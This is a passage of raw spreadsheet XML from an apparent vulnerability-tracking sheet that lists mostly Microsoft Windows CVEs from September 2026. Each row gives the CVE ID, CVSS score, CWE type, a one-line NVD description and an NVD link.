t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69314</t></is></c></row><row r="1261"><c r="A1261" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1261" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1261" s="5" t="inlineStr"><is><t>CVE-2026-69336</t></is></c><c r="D1261" s="5" t="n"><v>7.1</v></c><c r="E1261" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1261" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1261" s="5" t="inlineStr" /><c r="H1261" s="5" t="n"><v>0.005</v></c><c r="I1261" s="5" t="inlineStr" /><c r="J1261" s="5" t="inlineStr" /><c r="K1261" s="5" t="inlineStr" /><c r="L1261" s="5" t="inlineStr" /><c r="M1261" s="5" t="inlineStr" /><c r="N1261" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1261" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1261" s="5" t="inlineStr" /><c r="Q1261" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1261" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1261" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69336</t></is></c></row><row r="1262"><c r="A1262" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1262" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1262" s="5" t="inlineStr"><is><t>CVE-2026-69337</t></is></c><c r="D1262" s="5" t="n"><v>7.1</v></c><c r="E1262" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1262" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1262" s="5" t="inlineStr" /><c r="H1262" s="5" t="n"><v>0.007</v></c><c r="I1262" s="5" t="inlineStr" /><c r="J1262" s="5" t="inlineStr" /><c r="K1262" s="5" t="inlineStr" /><c r="L1262" s="5" t="inlineStr" /><c r="M1262" s="5" t="inlineStr" /><c r="N1262" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1262" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1262" s="5" t="inlineStr" /><c r="Q1262" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="R1262" s="5" t="inlineStr"><is><t>Double free in Windows Registry allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1262" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69337</t></is></c></row><row r="1263"><c r="A1263" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1263" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1263" s="5" t="inlineStr"><is><t>CVE-2026-69338</t></is></c><c r="D1263" s="5" t="n"><v>7.1</v></c><c r="E1263" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1263" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1263" s="5" t="inlineStr" /><c r="H1263" s="5" t="n"><v>0.005</v></c><c r="I1263" s="5" t="inlineStr" /><c r="J1263" s="5" t="inlineStr" /><c r="K1263" s="5" t="inlineStr" /><c r="L1263" s="5" t="inlineStr" /><c r="M1263" s="5" t="inlineStr" /><c r="N1263" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1263" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1263" s="5" t="inlineStr" /><c r="Q1263" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1263" s="5" t="inlineStr"><is><t>Use after free in Remote Desktop Gateway Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1263" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69338</t></is></c></row><row r="1264"><c r="A1264" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1264" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1264" s="5" t="inlineStr"><is><t>CVE-2026-69340</t></is></c><c r="D1264" s="5" t="n"><v>7.1</v></c><c r="E1264" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1264" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1264" s="5" t="inlineStr" /><c r="H1264" s="5" t="n"><v>0.005</v></c><c r="I1264" s="5" t="inlineStr" /><c r="J1264" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K126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4" s="5" t="inlineStr" /><c r="M1264" s="5" t="inlineStr" /><c r="N1264" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1264" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1264" s="5" t="inlineStr" /><c r="Q1264" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="R1264" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="S1264" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69340</t></is></c></row><row r="1265"><c r="A1265" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1265" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1265" s="5" t="inlineStr"><is><t>CVE-2026-69357</t></is></c><c r="D1265" s="5" t="n"><v>7.1</v></c><c r="E1265" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1265" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1265" s="5" t="inlineStr" /><c r="H1265" s="5" t="n"><v>0.004</v></c><c r="I1265" s="5" t="inlineStr" /><c r="J1265" s="5" t="inlineStr" /><c r="K1265" s="5" t="inlineStr" /><c r="L1265" s="5" t="inlineStr" /><c r="M1265" s="5" t="inlineStr" /><c r="N1265" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1265" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1265" s="5" t="inlineStr" /><c r="Q1265" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1265" s="5" t="inlineStr"><is><t>Use after free in Windows NDIS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1265" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69357</t></is></c></row><row r="1266"><c r="A1266" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1266" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1266" s="5" t="inlineStr"><is><t>CVE-2026-69358</t></is></c><c r="D1266" s="5" t="n"><v>7.1</v></c><c r="E1266" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1266" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1266" s="5" t="inlineStr" /><c r="H1266" s="5" t="n"><v>0.005</v></c><c r="I1266" s="5" t="inlineStr" /><c r="J1266" s="5" t="inlineStr" /><c r="K1266" s="5" t="inlineStr" /><c r="L1266" s="5" t="inlineStr" /><c r="M1266" s="5" t="inlineStr" /><c r="N1266" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1266" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1266" s="5" t="inlineStr" /><c r="Q1266" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="R1266" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Remote Desktop Client allows an authorized attacker to execute code over a network.</t></is></c><c r="S1266" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69358</t></is></c></row><row r="1267"><c r="A1267" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1267" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1267" s="5" t="inlineStr"><is><t>CVE-2026-69364</t></is></c><c r="D1267" s="5" t="n"><v>7.1</v></c><c r="E1267" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1267" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1267" s="5" t="inlineStr" /><c r="H1267" s="5" t="n"><v>0.005</v></c><c r="I1267" s="5" t="inlineStr" /><c r="J1267" s="5" t="inlineStr" /><c r="K1267" s="5" t="inlineStr" /><c r="L1267" s="5" t="inlineStr" /><c r="M1267" s="5" t="inlineStr" /><c r="N1267" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1267" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1267" s="5" t="inlineStr" /><c r="Q1267" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="R1267" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1267" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69364</t></is></c></row><row r="1268"><c r="A1268" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1268" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1268" s="5" t="inlineStr"><is><t>CVE-2026-69366</t></is></c><c r="D1268" s="5" t="n"><v>7.1</v></c><c r="E1268" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1268" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1268" s="5" t="inlineStr" /><c r="H1268" s="5" t="n"><v>0.006</v></c><c r="I1268" s="5" t="inlineStr" /><c r="J1268" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K126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268" s="5" t="inlineStr" /><c r="M1268" s="5" t="inlineStr" /><c r="N1268" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1268" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1268" s="5" t="inlineStr" /><c r="Q1268" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1268" s="5" t="inlineStr"><is><t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1268" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69366</t></is></c></row><row r="1269"><c r="A1269" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1269" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1269" s="5" t="inlineStr"><is><t>CVE-2026-69384</t></is></c><c r="D1269" s="5" t="n"><v>7.1</v></c><c r="E1269" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1269" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1269" s="5" t="inlineStr" /><c r="H1269" s="5" t="n"><v>0.004</v></c><c r="I1269" s="5" t="inlineStr" /><c r="J1269" s="5" t="inlineStr" /><c r="K1269" s="5" t="inlineStr" /><c r="L1269" s="5" t="inlineStr" /><c r="M1269" s="5" t="inlineStr" /><c r="N1269" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1269" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1269" s="5" t="inlineStr" /><c r="Q1269" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="R1269" s="5" t="inlineStr"><is><t>Null pointer dereference in Virtual Hard Disk (VHD) Miniport Driver allows an unauthorized attacker to deny service locally.</t></is></c><c r="S1269" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69384</t></is></c></row><row r="1270"><c r="A1270" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1270" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1270" s="5" t="inlineStr"><is><t>CVE-2026-69396</t></is></c><c r="D1270" s="5" t="n"><v>7.1</v></c><c r="E1270" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1270" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1270" s="5" t="inlineStr" /><c r="H1270" s="5" t="n"><v>0.005</v></c><c r="I1270" s="5" t="inlineStr" /><c r="J1270" s="5" t="inlineStr" /><c r="K1270" s="5" t="inlineStr" /><c r="L1270" s="5" t="inlineStr" /><c r="M1270" s="5" t="inlineStr" /><c r="N1270" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1270" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1270" s="5" t="inlineStr" /><c r="Q1270" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1270" s="5" t="inlineStr"><is><t>Use after free in Windows NDIS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1270" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69396</t></is></c></row><row r="1271"><c r="A1271" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1271" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1271" s="5" t="inlineStr"><is><t>CVE-2026-69451</t></is></c><c r="D1271" s="5" t="n"><v>7.1</v></c><c r="E1271" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1271" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1271" s="5" t="inlineStr" /><c r="H1271" s="5" t="n"><v>0.007</v></c><c r="I1271" s="5" t="inlineStr" /><c r="J1271" s="5" t="inlineStr" /><c r="K1271" s="5" t="inlineStr" /><c r="L1271" s="5" t="inlineStr" /><c r="M1271" s="5" t="inlineStr" /><c r="N1271" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1271" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1271" s="5" t="inlineStr" /><c r="Q1271" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1271" s="5" t="inlineStr"><is><t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1271" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69451</t></is></c></row><row r="1272"><c r="A1272" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1272" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1272" s="5" t="inlineStr"><is><t>CVE-2026-69460</t></is></c><c r="D1272" s="5" t="n"><v>7.1</v></c><c r="E1272" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1272" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1272" s="5" t="inlineStr" /><c r="H1272" s="5" t="n"><v>0.005</v></c><c r="I1272" s="5" t="inlineStr" /><c r="J1272" s="5" t="inlineStr" /><c r="K1272" s="5" t="inlineStr" /><c r="L1272" s="5" t="inlineStr" /><c r="M1272" s="5" t="inlineStr" /><c r="N1272" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1272" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1272" s="5" t="inlineStr" /><c r="Q1272" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1272" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1272" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69460</t></is></c></row><row r="1273"><c r="A1273" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1273" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1273" s="5" t="inlineStr"><is><t>CVE-2026-69482</t></is></c><c r="D1273" s="5" t="n"><v>7.1</v></c><c r="E1273" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1273" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1273" s="5" t="inlineStr" /><c r="H1273" s="5" t="n"><v>0.003</v></c><c r="I1273" s="5" t="inlineStr" /><c r="J1273" s="5" t="inlineStr" /><c r="K1273" s="5" t="inlineStr" /><c r="L1273" s="5" t="inlineStr" /><c r="M1273" s="5" t="inlineStr" /><c r="N1273" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1273" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1273" s="5" t="inlineStr" /><c r="Q1273" s="5" t="inlineStr"><is><t>CWE-379</t></is></c><c r="R1273" s="5" t="inlineStr"><is><t>Creation of temporary file in directory with insecure permissions in Windows Error Reporting allows an authorized attacker to perform tampering locally.</t></is></c><c r="S1273" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69482</t></is></c></row><row r="1274"><c r="A1274" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1274" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1274" s="5" t="inlineStr"><is><t>CVE-2026-69536</t></is></c><c r="D1274" s="5" t="n"><v>7.1</v></c><c r="E1274" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1274" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1274" s="5" t="inlineStr" /><c r="H1274" s="5" t="n"><v>0.004</v></c><c r="I1274" s="5" t="inlineStr" /><c r="J1274" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1274" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1274" s="5" t="inlineStr" /><c r="M1274" s="5" t="inlineStr" /><c r="N1274" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1274" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1274" s="5" t="inlineStr" /><c r="Q1274" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1274" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t></is></c><c r="S1274" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69536</t></is></c></row><row r="1275"><c r="A1275" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1275" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1275" s="5" t="inlineStr"><is><t>CVE-2026-69553</t></is></c><c r="D1275" s="5" t="n"><v>7.1</v></c><c r="E1275" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1275" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1275" s="5" t="inlineStr" /><c r="H1275" s="5" t="n"><v>0.005</v></c><c r="I1275" s="5" t="inlineStr" /><c r="J1275" s="5" t="inlineStr" /><c r="K1275" s="5" t="inlineStr" /><c r="L1275" s="5" t="inlineStr" /><c r="M1275" s="5" t="inlineStr" /><c r="N1275" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1275" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1275" s="5" t="inlineStr" /><c r="Q1275" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1275" s="5" t="inlineStr"><is><t>Missing authorization in Windows Hyper-V allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1275" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69553</t></is></c></row><row r="1276"><c r="A1276" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1276" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1276" s="5" t="inlineStr"><is><t>CVE-2026-69597</t></is></c><c r="D1276" s="5" t="n"><v>7.1</v></c><c r="E1276" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1276" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1276" s="5" t="inlineStr" /><c r="H1276" s="5" t="n"><v>0.006</v></c><c r="I1276" s="5" t="inlineStr" /><c r="J1276" s="5" t="inlineStr" /><c r="K1276" s="5" t="inlineStr" /><c r="L1276" s="5" t="inlineStr" /><c r="M1276" s="5" t="inlineStr" /><c r="N1276" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1276" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1276" s="5" t="inlineStr" /><c r="Q1276" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1276" s="5" t="inlineStr"><is><t>Use after free in Windows HTTP.sys allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1276" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69597</t></is></c></row><row r="1277"><c r="A1277" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1277" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1277" s="5" t="inlineStr"><is><t>CVE-2026-69602</t></is></c><c r="D1277" s="5" t="n"><v>7.1</v></c><c r="E1277" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1277" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1277" s="5" t="inlineStr" /><c r="H1277" s="5" t="n"><v>0.006</v></c><c r="I1277" s="5" t="inlineStr" /><c r="J1277" s="5" t="inlineStr" /><c r="K1277" s="5" t="inlineStr" /><c r="L1277" s="5" t="inlineStr" /><c r="M1277" s="5" t="inlineStr" /><c r="N1277" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1277" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1277" s="5" t="inlineStr" /><c r="Q1277" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1277" s="5" t="inlineStr"><is><t>Use after free in Windows PrintWorkflowUserSvc allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1277" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69602</t></is></c></row><row r="1278"><c r="A1278" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1278" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1278" s="5" t="inlineStr"><is><t>CVE-2026-69688</t></is></c><c r="D1278" s="5" t="n"><v>7.1</v></c><c r="E1278" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1278" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1278" s="5" t="inlineStr" /><c r="H1278" s="5" t="n"><v>0.006</v></c><c r="I1278" s="5" t="inlineStr" /><c r="J1278" s="5" t="inlineStr" /><c r="K1278" s="5" t="inlineStr" /><c r="L1278" s="5" t="inlineStr" /><c r="M1278" s="5" t="inlineStr" /><c r="N1278" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1278" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1278" s="5" t="inlineStr" /><c r="Q1278" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1278" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1278" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69688</t></is></c></row><row r="1279"><c r="A1279" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1279" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1279" s="5" t="inlineStr"><is><t>CVE-2026-69706</t></is></c><c r="D1279" s="5" t="n"><v>7.1</v></c><c r="E1279" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1279" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1279" s="5" t="inlineStr" /><c r="H1279" s="5" t="n"><v>0.004</v></c><c r="I1279" s="5" t="inlineStr" /><c r="J1279" s="5" t="inlineStr" /><c r="K1279" s="5" t="inlineStr" /><c r="L1279" s="5" t="inlineStr" /><c r="M1279" s="5" t="inlineStr" /><c r="N1279" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1279" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1279" s="5" t="inlineStr" /><c r="Q1279" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1279" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1279" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69706</t></is></c></row><row r="1280"><c r="A1280" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1280" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1280" s="5" t="inlineStr"><is><t>CVE-2026-69757</t></is></c><c r="D1280" s="5" t="n"><v>7.1</v></c><c r="E1280" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1280" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1280" s="5" t="inlineStr" /><c r="H1280" s="5" t="n"><v>0.007</v></c><c r="I1280" s="5" t="inlineStr" /><c r="J1280" s="5" t="inlineStr" /><c r="K1280" s="5" t="inlineStr" /><c r="L1280" s="5" t="inlineStr" /><c r="M1280" s="5" t="inlineStr" /><c r="N1280" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1280" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1280" s="5" t="inlineStr" /><c r="Q1280" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1280" s="5" t="inlineStr"><is><t>Use after free in Windows TCP/IP allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1280" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69757</t></is></c></row><row r="1281"><c r="A1281" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1281" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1281" s="5" t="inlineStr"><is><t>CVE-2026-69761</t></is></c><c r="D1281" s="5" t="n"><v>7.1</v></c><c r="E1281" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1281" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1281" s="5" t="inlineStr" /><c r="H1281" s="5" t="n"><v>0.005</v></c><c r="I1281" s="5" t="inlineStr" /><c r="J1281" s="5" t="inlineStr" /><c r="K1281" s="5" t="inlineStr" /><c r="L1281" s="5" t="inlineStr" /><c r="M1281" s="5" t="inlineStr" /><c r="N1281" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1281" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1281" s="5" t="inlineStr" /><c r="Q1281" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1281" s="5" t="inlineStr"><is><t>Use after free in Windows TCP/IP allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1281" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69761</t></is></c></row><row r="1282"><c r="A1282" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1282" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1282" s="5" t="inlineStr"><is><t>CVE-2026-69775</t></is></c><c r="D1282" s="5" t="n"><v>7.1</v></c><c r="E1282" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1282" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1282" s="5" t="inlineStr" /><c r="H1282" s="5" t="n"><v>0.005</v></c><c r="I1282" s="5" t="inlineStr" /><c r="J1282" s="5" t="inlineStr" /><c r="K1282" s="5" t="inlineStr" /><c r="L1282" s="5" t="inlineStr" /><c r="M1282" s="5" t="inlineStr" /><c r="N1282" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1282" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1282" s="5" t="inlineStr" /><c r="Q1282" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1282" s="5" t="inlineStr"><is><t>Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1282" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69775</t></is></c></row><row r="1283"><c r="A1283" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1283" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1283" s="5" t="inlineStr"><is><t>CVE-2026-71415</t></is></c><c r="D1283" s="5" t="n"><v>7.1</v></c><c r="E1283" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1283" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1283" s="5" t="inlineStr" /><c r="H1283" s="5" t="n"><v>0.002</v></c><c r="I1283" s="5" t="inlineStr" /><c r="J1283" s="5" t="inlineStr" /><c r="K1283" s="5" t="inlineStr" /><c r="L1283" s="5" t="inlineStr" /><c r="M1283" s="5" t="inlineStr" /><c r="N1283" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1283" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P1283" s="5" t="inlineStr" /><c r="Q1283" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1283" s="5" t="inlineStr"><is><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is></c><c r="S1283" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71415</t></is></c></row><row r="1284"><c r="A1284" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1284" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1284" s="5" t="inlineStr"><is><t>CVE-2026-71505</t></is></c><c r="D1284" s="5" t="n"><v>7.1</v></c><c r="E1284" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1284" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1284" s="5" t="inlineStr" /><c r="H1284" s="5" t="n"><v>0.002</v></c><c r="I1284" s="5" t="inlineStr" /><c r="J1284" s="5" t="inlineStr" /><c r="K1284" s="5" t="inlineStr" /><c r="L1284" s="5" t="inlineStr" /><c r="M1284" s="5" t="inlineStr" /><c r="N1284" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1284" s="5" 